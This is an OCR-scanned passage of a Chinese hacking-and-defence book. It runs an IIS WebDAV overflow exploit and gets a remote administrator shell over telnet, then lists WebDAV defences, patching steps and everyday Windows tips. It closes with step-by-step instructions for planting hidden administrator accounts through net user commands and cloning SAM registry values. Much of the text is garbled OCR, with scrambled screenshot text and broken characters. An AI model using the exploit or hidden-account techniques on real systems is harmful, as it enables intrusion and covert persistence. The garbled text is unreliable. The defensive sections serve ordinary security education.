始 溢出 攻击 。 


而 管理 号 : C\WINDOWS\system32\cmd exe -= 口 x 


呈 crosoft Windows [版 本 10.0. 17134. 319] ~ 
(c) 2018 JGcrosoft Corporation。 保 留 所 有 权利 。 


C:\Users\AdministratorYcd c:\ 


c: \Ywebdavx3. exe 192. 168.0.10 
其 运行 结果 如 下 : 


IIS WebDAV overflow remote exploit by 
isno@xfocus.org 

start to try offset 

if STOP a long time, you can press 
^C and telnet 192.168.0.10 7788 

try offset: 0 

try offset: 1 

try offset: 2 

try offsets 3 

WadElng for 19 estarto nb 


[Step 图 如 果 出 现 上 面 的 结果 则 表明 溢出 成 
功 ， 稍 等 两 三 分 钟 ， 按 Ctrl+C 组 合 键 结束 溢 
出 ， 再 在 “命令 提示 符 ” 窗 口中 输入 如 下 
命令 : telnet 192.168.0.10 7788， 当 连接 成 
功 后 ， 则 就 可 以 拥有 目标 主机 的 系统 管理 
员 权 限 ， 即 可 对 目标 主机 进行 任意 操作 。 


画 telnet 192.168.0.10 7788 口 x 


~ 


在 “命令 提示 符 ” 窗 口中 输入 命令 : 
cd ci\， 即 可 进入 目标 主机 的 C: 盘 目录 。 
画 CWWINDOWS\system32\cm... 一 口 X 


(c) 2018 Ji crosoft Corporation。 保 留 所 有 权利 。 ^ 


[C:NUsersVAdministrator>cd c:\ 


c:\> 


v 


2.4.3 ” WebDAV 缓冲 区 溢出 漏洞 的 防御 时 


如 果 不 能 立刻 安装 补丁 或 者 升级 ， 用 晶 
户 可 以 采取 以 下 措施 来 降低 威胁 。 
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(1) 使 用 微软 提供 的 IIS Lockdown 工 具 
防止 该 漏洞 被 利用 。 


(2) 可 以 在 注册 表 中 完全 关闭 WebDAV 


包括 的 PUT 和 DELETE 请 求 ， 具 体 的 操作 步 
又 如 下 。 

[step 图 启动 注册 表 编 辑 器 。 在 “运行 ”对 话 
框 中 输入 命令 regedit， 然 后 按 Enter 键 ， 打 
开 “ 注 册 表 编辑 器 ”窗口 。 


肢 注册 家 澳 久 对 - DO 
六 生地， 二 要 V】 by 大夫 二) 
时 ES 
HkEv CussEs poor MW Re sz 
| HECURRENT USER | 
‘HKEY LOCAL MACHINE 
Hev UseRS 
HkEVCURRENT.CONNG 


[tNHKEY LOCAL MACHINE 

[step 图 在 注册 表 编 辑 器 中 依次 找到 如 下 
所 示 的 键 : HKEY_ LOCAL MACHINE\ 
SYSTEM\CurrentControlSet\Services\ 
W3SVO\Parameters。 


加 注册 直 状 器 a ) 尖 ， 二 其 
Ei 查看。 改 芒 立 (AI 寿 中 (H) 
weve 


计算 NHKEY LOCAL MACHI NE\SYSTEM\CurrentControlSet\Senvicec\W3SVC\ Parameters 


step 图 选中 该 键 值 后 单 击 右键 ， 从 弹出 的 快 
捷 菜 单 中 选择 “新 建 ” 选 项 ， 即 可 新 建 一 个 
项 目 ， 并 将 该 项 目 命名 为 DisableWebDAV。 
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[HVAKEY LOCAL MACHINE\SYSTEM\CurentTontrolSenSerices\W3SVC\Parameters\Dicable WebDAV 
[Sep 四 选中 新 建 的 项 目 “DisableWebDAV”， 
在 窗口 右 侧 的 “数据 ”下 侧 单 击 右键 ， 从 弹 
出 的 快捷 菜单 中 选择 “新 建 ” 一 “DWORD 
(32 位 ) 值 (D) ”选项 。 


CE 9 x 


[step 图 选择 完毕 后 ， 即 可 在 “注册 表 编 辑 
器 ”窗口 中 新 建 一 个 键 值 。 选 择 该 键 值 并 
右 击 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ” 
选项 ， 打 开 “ 编 辑 DWORD (32 位 ) 值 ” 
对 话 框 ， 在 “数值 名 称 ” 文 本 框 中 输入 
DisableWebDAV， 在 “数值 数据 ”文本 框 中 
输入 1。 


六 各 DWORD (32 艺人 x 
人 (N}: 
DisableWebDAV 
EV a 
1 hrs) 
DOD) 
Cm | 六 


step 较 单 去 “确定 ”按钮 ， 即 可 在 注册 表 
完全 关闭 WebDAV 包 括 的 PUT 和 DELETE 


[ee 


< EE i 


2.5 系统 漏洞 的 防护 策略 


要 想 防范 系统 的 漏洞 ， 首 选 就 是 及 时 
为 系统 打 补 丁 ， 下 面 介 绍 几 种 为 系统 打 补 
丁 的 方法 。 

2.5.1 使 用 “Windows 更 新 ”及 时 更 
新 系统 

“Windows 更 新 ”是 系统 自 带 的 用 于 
检测 系统 更 新 的 工具 。 使 用 “Windows 
更 新 ”可 以 下 载 并 安装 系统 更 新 文件 ， 以 
Windows 10 系 统 为 例 ， 具 体 的 操作 步 又 
如 下 。 

[Eee 国 单 去 “开始 ”按钮 ， 在 打开 的 菜单 中 
选择 “设置 ”选项 。 


文件 资源 管理 器 


地 设置 和 
中 电源 


汪 所 有 应 用 


器 OO 图 


[ep 图 打开 “设置 ”窗口 ， 在 其 中 可 以 看 到 
有 关系 统 设置 的 相关 功能 ， 单 击 “ 更 新 和 
安全 ”图 标 。 
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a 
号 
二 由 
内 个 
Ce 


[ 


step 图 打开 “更 新 和 安全 ”窗口 ， 在 其 中 选 


择 “Windows 更 新 ”选项 ， 并 单 击 “ 检 查 更 


新 ”按钮 。 
< 炭 

和 nine 
Windows Defender 
各 从 


你 复 


否 存 在 更 新 文件 。 


¢ 旺 


Bo 3 


Windows Defender 


乞 从 


信和 


囊括 


针对 开发 人 中 


Windows 更 新 


89 没入 已 安 区 二 新 的 更 新 ， 上 次 检 吉 时间 昨天 10:42 


以 二 四 新 


株 下载 放 向 动 安装 可 用 更 新 ， 


正在 全 所 有 关 最 新 更 新 的 信息 /7 
了 朋 生 丈 信息 


噩 m 迁 莉 


Windows 更 新 


EE 


正在 说 拓 有 关 录 新 更 新 的 信息 后 1 
了 解 更 8 信息 


吉 吕 和 击 


[step 图 此 时 ， 可 以 看 到 系统 开始 检查 网 上 是 


step 图 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 会 
弹出 如 下 图 所 示 的 信息 提示 ， 提 示 用 户 “ 有 
可 用 更 新 ”， 并 自动 开始 下 载 更 新 文件 。 
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< 三 


和 WINDows 更 新 


Windows 更 新 


有 可 用 更 新 。 
~ 通用 于 Windows 10 Version 1511 的 时 积 更 新 (KB3124262)。 


评 开 信息 


正在 准 备 安装 更 新 70%6 


正在 查找 有 关 最 新 更 新 的 信息 多? 
了 解 更 多 信息 


高 级 党 项 


step 国 下 载 完成 后 ， 系 统 会 自动 安装 更 新 文 
儿 件 。 安 装 完 毕 后 ， 会 弹出 如 下 图 所 示 的 信 
息 提 示 框 。 单 击 “ 立 即 重新 启动 ”按钮 ， 
立即 重新 启动 电脑 。 


+ 组 = | 
加 ”wiINDOWs 更 断 | 
已 为 你 安排 了 一 次 重启 
和 要， 信人 和 拉 动 》 也 可 村 条 这 醒 村人 为 人 方志 行 ， 请 网民 在 于 

将 设备 所 通电 溯 ， 根 更 新 的 大 小 ， 安 壬 可 六 天 一 舌 时 网， 
国 吉 备 格 在 用 委 时 重启 (明天 3:30 似乎 合 许 ). 
〇 洁 卫 重 新 启动 时 间 
时 
| ES 
昌吉 
[是 > 
了 重新 局 动 
正在 要 要 有 关 急 新 于 条 的 信 咎 3? 
了 骨 更 才 信 息 
Step 车 重新 启动 完毕 后 ， 再 次 打开 “Windows 
更 新 ”窗口 ， 在 其 中 可 以 看 到 “你 的 设备 
已 安装 最 新 的 更 新 …… ”信息 提示 ， 单 击 
“高 级 选项 ” 超 链 接 。 
¢ 放 = | 
入 min 全 ED 
SS 
Wo Dole 人 的 设备 已 安 半 全新 的 更 新 ， 上 次 检 去 时 间 ; 今天 
1607 
和 从 
人 检查 更 新 
油 舌 将 下 载 并 让 动 安 新 可 用 村 新， 
针对 开发 人 员 正在 过 有 关 晰 更 新 的 信 咎 扩 ? 
了 解 更 多 信息 
高 弛 选项 
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step 图 打开 “高 级 选项 ”设置 界面 ， 在 其 
中 可 以 选择 安装 更 新 的 方式 。 


二 二 


2.5.2 ”使 用 《360 安 全 卫士 》 下 载 并 安 
装 补丁 

除 使 用 Windows 系 统 自 带 的 Windows 
Update 下 载 并 及 时 为 系统 修复 漏洞 外 ， 还 可 
以 使 用 第 三 方 软件 及 时 为 系统 下 载 并 安装 
漏洞 补丁 ， 常 用 的 有 《360 安 全 卫士 》《 优 
化 大 师 》 等 软件 。 

使 用 《360 安 全 卫士 》 修 复 系统 漏洞 的 
具体 操作 步骤 如 下 。 
双击 桌面 上 的 “360 安 全 卫 上 ”图 
标 ， 打 开 “360 安 全 卫士 ”窗口 。 


i 单 二 “系统 修复 ”按钮 ， 进 入 下 图 所 
示 的 界面 。 


[step 图 单 击 “全 面 修复 ”按钮 ，《360 安 全 
卫士 》 开 始 自动 扫描 系统 中 存在 的 漏洞 ， 

并 在 下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 
可 以 自主 选择 需要 修复 的 漏洞 。 


Sraace TS 


Step 加 单 去 “一 键 修复 ”按钮 ， 开 始 修复 系 
统 存在 的 漏洞 。 


pannel (mt 


[Sep 图 修复 完成 后 ， 会 在 界面 中 给 出 相应 的 
提示 信息 ， 并 且 会 出 现 “完成 修复 ”按钮 。 


请 根据 需要 修复 可 选 顺 wsae 


人 


PR - 16 Eenr EREnEsm = 


完成 修复 
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2.6 实战 演练 


实战 演练 1 一 一 使 用 系统 工具 整理 磁盘 
碎片 


磁盘 碎片 整理 是 指 重 新 排列 卷 上 的 数 
据 并 重新 合并 碎片 数据 ， 有 助 于 计算 机 更 
高 效 地 运行 。 在 Windows 10 操 作 系 统 中 ， 
磁盘 碎片 整理 程序 可 以 按 计 划 自 动 运行 ， 
用 户 也 可 以 手动 运行 该 程序 或 更 改 该 程序 
使 用 的 计划 ， 具 体操 作 步 又 如 下 。 
[sep 加 打开 “此 电脑 ”窗口 ， 在 需要 整理 碎 
片 的 分 区 上 右 击 ， 并 在 弹出 的 快捷 菜单 中 
选择 “属性 ”选项 。 


Ei Ed oo x 
EE := = ez ba 0 
| < 下 古 二 IO 万 
设备 5 章 奸 t 理 方 式 (5) 

+ a = 
上 人 RE 
| 至 mms mn D) 

Ch | > 中 
[step 图 弹出 “Windows10(C:) 属 性 ”对 话 


框 ， 选 择 “ 工 具 ” 选 项 卡 ， 在 “对 驱动 器 
进行 优化 和 碎片 整理 ”下 单 击 “ 优 化 ” 
按钮 。 


二 Windows10 (C) 尾 性 x 
第 规 工具 硬件 共享 ”安全 。 以 前 的 版 本 配额 
吾 描 
此 过 项 检 检 查 汇 动 器 中 的 文件 系统 错误 


-” 


对 活动 器 进行 优化 和 碎片 整理 
其 优化 计算 机 的 弧 动 右 可 以 帮助 其 更 高 效 运行 . 


优化 (0) 


ae | mw | 


step 图 弹出 “优化 驱动 器 ”窗口 ， 选 择 需要 
整理 碎片 的 磁盘 ， 单 击 “ 分 析 ” 按 钮 。 
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a 


黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


集 可 以 这 化 下 区 基肥 共和 更 放 准 地 运行 “或 分 析 过 强 [/ 了 名 是 百科 本 其 二 Ko 


态 ” 列 下 显示 碎片 分 析 的 进度 。 
区 HE 
mem TE 


上 一 次 汪 和 辣 。。 当 新城 志 


wn * 
加 TD 2018/11/21 1046。 正 时 人 F 上 要 本寺 二 94) 
208/11/21 1045 ESG ER FA) 


HT) 


2 


0 


[ssp 图 分 析 完 成 后 ， 系 统 开始 自动 对 硬盘 碎 
片 进行 整理 操作 ， 并 显示 整理 的 进度 。 


PE 


你 可 以 化 基 二 .二 加 计 其 仙 机 本 St 二， 或 者 全 全 芭 强 LI 了 名 吾 宏 要 如其 汪 做 


i i 
一 [7 EE i ET 
st py rr ET) 
2 ee 2 te 
a 到 ey 
rt i 
a 一 一 滑 | 
正三 本 动作 化 开 一 疾 . 带动 吉 不 二 加 伟 化。 
pg 
IO DO | 
A 二 
step 轩 系统 开始 自动 分 析 磁 盘 ， 当前 状 


[Sep 加 弹出 “优化 驱动 器 ”对 话 框 ， 用 户 
可 以 设置 自动 检查 碎片 的 频率 、 时 间 和 
磁盘 分 区 ， 设 置 完 成 后 ， 单 击 “ 确 定 ” 
按钮 。 


优化 驱动 器 


优化 计划 


回 按 计 划 运 行 推 逢 )(R) 


频率 每 周 


回 


如 果 注 续 错 过 三 次 计划 的 运行 ， 则 通知 我 (N) 


开动 器 (D) Ea) 


[sep 图 返回 到 “优化 驱动 器 ”窗口 ， 单 
击 “ 关 闭 ” 按 钮 ， 即 可 完成 磁盘 的 碎片 


MO | 


整理 。 
#0 
Ea x 
EF] EE EE。 
| FILE 
rr 2018/11/21 1045。 正 于 于 上 三 声 度 0) 
一 IF Ra 2018N /21 1045 Em enept 0) 
Wm 
2 Er EE 
Wndows Ce 2018/11/27 1891。 正 S03 二 2%) 
#0) Ba 2018/11/21 1046。 正 竺 Gx 时 2 守 让 OW) 
MN Ho I 5 manTeT 1046 下 08H 守 OI 
lt 
E59] 
Eahh. 
py EE eo) 
ms] | J] EE 
Fea 
2 
step 图 除了 手动 整理 磁盘 碎片 外 ， 用 户 还 
可 以 设置 自动 整理 碎片 的 计划 ， 单 击 “ 启 9 
用 ”按钮 。 
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实战 演练 2 一 一 关闭 开机 时 的 多 余 启 动 项 

在 电脑 启动 的 过 程 中 ， 自 动 运行 的 程 
序 称 为 开机 启动 项 。 有 时 一 些 木 马 程序 会 在 
开机 时 运行 ， 用 户 可 以 通过 关闭 开机 启动 项 
来 提高 系统 安全 性 ， 具 体 的 操作 步骤 如 下 。 
[step 图 按键 盘 上 的 Ctrl+AltHtDelete 组 合 键 ， 
打开 如 下 图 所 示 的 界面 。 


step 较 单 直 “任务 管理 器 ”选项 ， 打 开 “ 任 
务 管理 器 ”窗口 。 


| 则 人 时 i 
文件 选中 (D) 得 看 (V) 
进程 性 般 应 用 历史 记录 “启动 用 户 详 绍 信息 服务 


11% 58% 0% 0% 
cpu 内 三 网 各 


名 称 


应 用 (4) 
请 360 安 全 M 光 短 oMbps 
团 Microsoft Word OMbps 
后 Windows 资源 管理 路 (3 0 Mbps 
全 任 多 管理 二 0 Mbps 
后 台 进程 (41) 
360 安全 i 路 OMbps 
后 360 安全 洛 中 OMbpe 
咎 360 雪 全 浏 师 器 0 Mbps 
后 360 安 全 济 拘 器 O Mbps 
后 360 安 全 浏 阁 器 OMbps v 
) 简略 信息 (D) 结 素 务 但 


step 图 选择 “启动 ”选项 卡 ， 进 入 “启动 ” 
界面 ， 在 其 中 可 以 看 到 系统 中 的 开机 启动 
项 列表 。 


并 (管理 器 一 日 Xx 
文件 旧 ” 选 硕 (0) 查看 V) 
进 健 ”性 能 应 用 历史 记录 启动 用 户 ”详细 信息 ”服务 


3 5 而 共 坟 局 引 有 机 


辕 360 安 全 了 士 安全 防护 中 心 .。 360.cn Be 用 高 
怠 Brindicator Brother Industries, Ltd、 已 后 用 
苇 cTF mB Microsoft Corporation ”已 后 用 低 
二 Microsoft OneDrive Microsoft Corporation ”已 宇 用 高 
留 Status Monitor Application Brother Industries, Ltd. 已 三 用 中 
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[step 罗 选择 开机 启动 项 列表 中 需要 禁用 的 启 回 
动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁止 该 启明 
动 项 开机 自 启 。 


亲人 千 二 二 - DO x 
忻 (月 运 项 (0) 可 看 (V) 
进 性 ”性 能 应 用 历史 记录 启动 用 户 洋 沿 信息 服务 
生生 发 布 者 状态 启动 响 
图 360 安 全 了 十 安全 防护 中 心 。 360.cn ES 高 
BB Brindicator Brother Industries, Ltd， 已 启用 中 
团 cTF me Micresoft Corporation ”已 启用 低 
全 Microsoft OneDrive Micresoft Corporation 已 本 用 高 
好 Status Monitor Aoolication。 Brother Industries. Ltd， 已 启用 中 
< 
简略 信息 (D) 启用 (N) 


2.7 小 试 身手 


练习 1: 怎样 用 左手 操作 键盘 


如 果 用 户 习惯 用 左手 操作 鼠标 ， 就 需 名 
要 对 系统 进行 简单 设置 ， 以 满足 用 户 个 性 
化 的 需求 。 具 体操 作 步 又 如 下 。 
[Step 加 在 桌面 的 空白 处 单 击 鼠 标 右 键 ， 在 
弹出 的 快捷 菜单 中 选择 “个 性 化 ”菜单 命 
令 ， 在 弹出 的 “设置 ”窗口 中 单 击 左 侧 的 
“主题 ”一 “鼠标 光标 ” 超 链接 。 


回 背 层 
De 
局 Wen 
耳 直 
入 字体 


于 到 


[step 图 弹出 “所 标 属性 ”对 话 框 ， 选 择 “ 息 
标 键 ”选项 卡 ， 然 后 匀 选 “切换 主要 和 次 
要 的 按钮 ” 复 选 框 ， 单 击 “ 确 定 ” 按 钮 即 
可 完成 设置 。 


25 


SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


快速 启动 区 域 ， 


之 和 标 层 住 
铺 标 建 指针 。 指针 选项 滑轮 。 硬件 


请 标 欠 本 年 
切 尝 主要 和 次 要 的 按 租 (S] 


选择 此 复 迁 和民 宁 符 右 按 得 设 成 20 迁 经 和 污 改 等 主要 也 
性 能 使 用 


双 二 过度 
双 去 文件 夫 以 检测 你 的 设置 ， 如果 文件 夫 没 打开 或 关 
闭 ， 请 用 慢 一 点 的 设置 再 坛 一 次 . 


速度 (D):， 慢 [ 锯 E 
单 二 名 定 

口 启用 单 去 锁定 (T) 

使 你 可 以 不 用 一 直 按 着 万 标 按 委 就 可 以 赤 出 显示 或 抱 搜 ， 单 二 全 标 以 进 
入 钠 定 状态 再 次 单 二 饼 标 可 解除 负 定 , 


务 栏 的 程序 ， 单 击 和 鼠标 右键 ， 在 弹出 快捷 
菜单 中 选择 “固定 任务 栏 ” 命令 ， 即 可 将 
其 固定 到 任务 栏 中 。 


因 练 习 2: 将 应 用 程序 固定 到 任务 栏 
”用户 除了 可 以 将 程序 固定 到 “开始 ” 
屏幕 外 ， 还 可 以 将 程序 固定 到 任务 栏 中 的 
以 便 使 用 程序 时 快速 启 


动 。 具 体操 作 步 骤 如 下 。 
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step 国 单 击 “开始 ”按钮 ， 选 择 要 添加 到 任 


[step 图 对 于 不 常用 的 程序 图 标 ， 用 户 也 可 
以 将 其 从 任务 栏 中 删除 。 右 键 单 击 需 要 删 
除 的 程序 图 标 ， 在 弹出 的 快捷 菜单 中 选择 
“从 任务 栏 取 消 固定 ”命令 即 可 。 


第 3 董 


系统 入 侵 与 远程 控制 的 


防护 策略 


随 着 计算 机 的 发 展 及 应 用 的 广泛 性 ， 越 来 越 多 的 操作 系统 为 满足 用 户 的 需求 ， 在 其 中 
加 入 了 远程 控制 功能 ， 这 一 功能 本 来 是 方便 用 户 使 用 的 ， 但 也 为 黑客 们 所 利用 。 本 章 介绍 
系统 入 侵 与 远程 控制 的 防护 策略 ， 主 要 内 容 包括 系统 入 侵 的 常用 手段 、 远 程控 制 工 具 入 侵 


系统 的 方法 及 远程 控制 的 防护 策略 等 。 


3.1 通过 账号 入 侵 系 统 的 常用 
手段 


入 侵 计算 机 系统 是 黑客 的 首要 任务 ， 
无 论 采 用 什么 手段 ， 只 要 入 侵 到 目标 主机 
的 系统 当中 ， 这 一 台 计算 机 就 相当 于 是 黑 
客 的 了 。 本 节 介 绍 几 种 常见 的 入 侵 计 算 机 
系统 的 方式 。 


3.1.1 使 用 DOS 命 令 创建 隐藏 账号 


黑客 在 成 功 入 侵 一 台 主机 后 ， 会 在 该 
主机 上 建立 隐藏 账号 ， 以 便 长 期 控制 该 主 
机 ， 下 面 介绍 使 用 命令 创建 隐藏 账号 的 操 
作 步 又 。 

[step 国 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”选项 ， 打 开 “ 运 行 ” 对 
话 框 ， 在 “打开 ”文本 框 中 输入 cmd。 


| 杏 二 x 


Windows 检 根 据 你 所 给 入 的 名 称 ， 为 你 打开 恰 宙 的 香 序 、 
末 ns >e meet 


| 打开 (ok |cmd 
轩 借用 管理 权 情 创建 比 任务 


| [CC | 陋 (8).. 
[sep 图 单 去 “确定 ”按钮 ， 打 开 “ 命 令 提 示 
符 ” 窗 口 。 在 其 中 输入 net user ty$ 123456 / 
add 命 令 ， 按 Enter 键 ， 即 可 成 功 创建 一 个 
名 为 “ty$”、 密 码 为 “123456” 的 隐藏 
账号 。 


画 管理 呈 : CWWINDOWS\system32\cmd.exe 二 口 x 


Jicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Mi crosoft Corporation。 保 留 所 有 权利 。 


CG:\Users\Administratornet user ty$ 123456 /add 
3 


C:\Users\Administrator> 


输入 net localgroup administrators ty$ / 
add 命 令 ， 按 Enter 键 后 ， 即 可 为 该 隐藏 账号 
赋予 管理 员 权 限 。 


丽 答 理 呈 : C\WINDOWS\system32\cmd.exe 一 口 


Ji crosoft Windows [版 本 10. 0. 17134. 319] 
(ce) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


G: \Vsgre WdpinistratorYnet user ty$ 123456 /add 
命令 成 功 完成 。 


EC: Yop stratorYnet localgroup administrators ty$ /add 
命令 成 功 完成 。 


:NUsersNAdministrator)。 


[Sep 四 再 次 输入 net user 命 令 ， 按 Enter 键 
后 ， 即 可 显示 当前 系统 中 所 有 已 存在 的 账 
号 信息 ， 但 是 发 现 刚刚 创建 的 “ty$” 并 没 


而 管理 员 : C\WWINDOWS\system32\cmd.exe 一 口 


[C:NUsersVAdministrator>net user 


\\DESETOP-RJEMMOC 的 用 户 账户 


IAdministrator DefaultAccount defaultuser0 
Gues: qiangu test 
WDAGUtilityAccount 

命令 成 功 完成 。 


C:\Users\Administrator> 


由 此 可 见 ， 隐 藏 账号 可 以 不 被 命令 查 
看 到 。 不 过 ， 这 种 方法 创建 的 隐藏 账号 并 


不 能 完美 被 隐藏 。 查 看 隐藏 账号 的 具体 操 
作 步 又 如 下 。 

[ep 图 在 桌面 上 右 击 “ 此 电脑 ”图 标 ， 在 弹 
出 的 快捷 菜单 中 选择 “管理 ”选项 ， 打 开 
“计算 机 管理 ”窗口 。 


量 计算 机 怎 理 口 x 
文件 (F)” 损 作 (A ”过 春 (V) 帮助 (H) 
和 中 | 司 忆 | 日 国 


王仁 » 


[step 图 依次 展开 “系统 工具 ”一 “本 地 用 户 
和 组 ”一 “用 户 ” 选 项， 这 时 在 右 侧 的 窗 
格 中 可 以 发 现 创 建 的 “ty$” 隐 藏 账号 依然 


盟 计算 机 管理 = 可 潮 
文 作 。 损人 ff(A) 查看 MV) 帮助 (4 
中 中 | 自 加 | 居 国 丁目 回 
类 计算 机 等 理 (本 地 ) 名 称 全 名 操作 
Dis 世 Administrat la 
计划 加 Defauha 
Defauhacc- 
国 可 要 着 国 defauhuser0 
本 SR 国 Gues 轻生 
了 本 NE 部 qiong Admin 更 多 并 作 上 
ea 请 tes dot 
四 得 
四 全 = 
人 加 WDAGUtiit. 
v 名 人 
| 近 磁 站 管理 
服务 和 应 用 程序 
< > 


侈 提示 :这 种 隐藏 账号 的 方法 并 不 实用 ， 
只 能 做 到 在 “命令 提示 符 ” 窗 口中 隐藏 ， 
属于 入 门 级 的 系统 账户 隐藏 技术 。 


加 3.1.2 ”在 注册 表 中 创建 隐藏 账号 


注册 表 是 Windows 操 作 系 统 的 数据 库 ， 
包含 系统 中 非常 多 的 重要 信息 ， 也 是 黑客 
最 多 关注 的 地 方 。 下 面 就 来 看 看 黑客 是 如 
何 使 用 注册 表 来 隐藏 账号 的 。 

[step 国 | 选择 “开始 ”一 “运行 ”选项 ， 打 开 


28 


= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


“运行 ”对 话 框 ， 在 “打开 ”文本 框 中 输 
入 regedit。 


吾 运行 x 


画 Windows 将 根 安 你 所 输入 的 名 称 ,为 你 打开 相应 的 程序 
文件 夫 . 文 或 Internet 资源 . 


FF(O): |regedi ~ 


Ew |] Ew 


step 图 单 去 “确定 ”按钮 ， 打 开 “ 注 册 表 
编辑 器 ”窗口 ， 在 左 侧 窗口 中 ， 依 次 选择 
HKEY LOCAL MACHINE\SAM\SAM 注 册 
表 项 ， 右 击 SAM， 在 弹出 的 快捷 菜单 中 选 
择 “ 权 限 ” 选 项 。 
图 注 押 表 次 坟 汪 如 英 
六 HIP _ 关 坟 旧病 VI 尺 直 A al 
Y 国 计 豆 内 HR 了 > 
图 key cusses ROOT REGSZ 
~“ Hxer Locat MAcHINE 负 ServerDomain。 REG_BINARY 
属 scpooooocoo 


局 HARDWARE 
vsAw 


浏览 (B)… 


E20 
IN) 
ga 
erD) 
SE 
el) 


打开 “SAM 的 权限 ”对 话 框 ， 在 
“组 或 用 户 名 ” 栏 中 选择 “Administrators 
(DESKTOP-JIMQAAOB\A dministrators) ”， 

然后 在 “Administrators 的 权限 ” 栏 中 色 选 
“完全 控制 ”和 “ 读 取 ” 复 选 框 ， 单 击 
“确定 ”按钮 保存 设置 。 


出 SAN HR x 


二 全 
如 用 交 (G): 
唐 SYSTEM 
苦 Admiristatcrs (DESKTOP-JMQAAOBVAdministretors) 


话 20(D) WAAR) 
Administrators 的 权限 iP) 天 许 E43 
充 位 制 | 口 
Ed 可 全 
竺 区 权限 
大和 信和 卫 吉 朗 宇 ， 诗 革 二 二 各 总 MW 
CJ ww 


step 回 依次 选择 HKEY LOCAL MACHINE\ 


SAM\SAM\Domains\Account\Users\ Names 
注册 表 项 ， 即 可 查看 到 以 当前 系统 中 的 所 


有 系统 账户 名 称 命名 的 子 项 。 


本 二 =- oo x 
HH] SH EE es) 
[FER EY LOCAL MACHINE\SAMVEAM\P om cma Ner omal eer A Nemes 
EE ES 上 
CE NEGNONE (Even 
间 sEcuRmv » 


Ey “导出 ”选项 。 


时 二 所 交 渗 
Et 


右键 单 击 “ty$” 项 ， 在 弹出 的 快捷 


MBN IKEY LOCALMACHINEV SANNSAN\Dormaina Aceou iarrs Noes WS 


oo000is E33 E33 

0000015 译 G aa 
00000177 

日 oo 

旧 ooooaes 

Eps 

Bo vem ， 


DAGUsioyacroun 
由 sun 
auUpgrade | 


step 图 打开 “导出 注册 表 文 件 ” 


对 话 框 ， 


本 六 渍 本 关 为 ty.reg， 然 后 单 击 “ 保 存 ” 按 


钮 ， 即 可 导出 ty.reg。 


| 本 S 册 雪 交 件 x 
风 在 D， [图 文本 “| OF 
如 证 4tB 基 
人 6。 国 260j Fles 2018/11/26 1645 
sa server Management Studio 2018/9/19 13:23 
Fal ncent Files 2018/11/28 1056 
mm vielsudioz0ts 2018/s9 1337 
文件 名 加 yr CS 
保 放 类 型 (0)。 [十 邮 文件 Grea 2 
导出 范 国 
O28W 
国有 9 支 卓 
HKEY LOCAL MACHINE\SAM\SAN\Domains\Acrount\Users\Names\yS 
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[step 图 按照 Step05 和 Step06 的 方法 ， 将 
HKEY LOCAL MACHINE\SAM\SAM\ 
Domains\ Account\Users\ 下 的 000001F4 和 
000003E9 项 分 别 导出 并 命名 为 administrator. 
Teg 和 userreg。 


| 性 而 表 文 件 . 
| 。 各 让 在 四 ; [四 让 -| @ 人 好 双 四- 
和 和 " 修改 日 其 i 
3s0j: Fles 2D1a11/251645 = ; 
DsQL Sever Monegement Studio 2018/9/19 1323 


2018/11/29 1056 


2018/11728 11:36 
2018/11/28 11:37 
2018/11/28 11:36 


HS: [ainiseaer -| 
信和 交 雪 1) | 注册 六 四 ( eee] 要 两 
Sram 
Om) 
OW 


| [HEV LOCAL MACHINESAMN\SAM\Domaine AceountlUeere\D00003E 


图 用 记事 本 打开 administrator.reg， 选 
中 “"F"= 后 面 ” 的 内 容 并 复制 下 来 ， 然 后 
打开 userreg， 将 “"F"= 后 面 ” 的 内 容 替 换 
掉 。 完 成 后 ， 将 user.reg 进 行 保存 。 


HN RE NeiC) EV 部 助 
Windows Registry Editor Version 5.00 ^ 


00.1001 ‘0.01,00,00,1a,00,00,00,00,00.00,00\ 
2c01.0C .00.00.00.00 .00.00.00.00.00.00 .2c\ 


01000C )00.00.00.00.00.0000.00.2c01\ 
00.000C )00.00 00.00.00.00.00.00.2c0T00A 
00.00.0C sz uri 5,00,00,00,38,00,00,00,44,01,00,00\ 
,00,00,00,00,00,00,54.01,00,00,38\ 
,00,00.00,00,00,b4,01,00,00,18,00\ 
,24,00,00,00,14,00,00,00,44,00,00\ 
00.05.01.01.01.00.00.00.00.0001A 


下 er -3 = 
文件 由 ”篇 别 [E) 获 式 (Oj 查看 V) 等 勒 (H) 
Windows Registry Editor Version 5.00 | 


[HKEY LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000003E 


0,00,00,00 ,be,9e,ee.c1, 44,01,00,0 


d4.01.00.00.00.00.00.00.00.00.Of 
0.00.00.00 00 00.00.00.00.0b .00.01.00 00.00 00 


‘hexcD0.00,00.00,14,00,00,00,03,00,01.00.14,00,00,00,0c,00,00,00,00,00,00\ 
00,00.01,00,00,03,00,00,00,00,00,00,00,0c,01,00,00,00,00,00,00,00,00,00,00\ 
0c.01.00,00.00.00.00.00.00.00.00.00.0c.01.00.00.00.00.00.00.00.00.00.00.0c\ 
01,00,00,00,00,00,00,00,00,00,00.0c.01,00,00,00,00,00,00,00,00,00,00,0G.01\ 
00,00.00.00,00.00,00.00,00,00.0c.01,00.00,00.00.00.00,00,00.00.00.0c.01,00\ 
epee ell bonnooon an nara ,00,00\ 
‘08,00,00,00,01,00,00,00,14.01,00,00,18,00,00.,00,00,00,00,00,2c,01.: .00.00.: 


00004 onoQooonoQ64Ot00 4 18.00.004 0000 9000 00. ,7c,01,00,00,18,00\ 
00.00.00.00.00.00.01.00.14.80.d400.00.00.e400.00.00.14.00.00.00.44.0000\ 
00,02.00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01\ 
00,00.00.00,02.c0,14.00,f.07.0f.00,01,01,00,00,00,00.00,05,07.,00,00,00.02\ 

